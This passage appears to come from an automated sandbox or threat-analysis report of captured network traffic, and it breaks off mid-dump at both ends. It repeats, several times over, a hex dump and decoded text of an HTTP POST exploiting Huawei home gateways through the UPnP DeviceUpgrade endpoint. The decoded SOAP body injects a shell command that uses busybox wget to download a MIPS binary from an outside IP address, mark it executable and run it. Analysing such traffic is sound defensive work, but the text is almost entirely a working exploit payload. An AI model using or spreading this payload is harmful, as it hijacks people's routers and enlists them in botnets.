69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 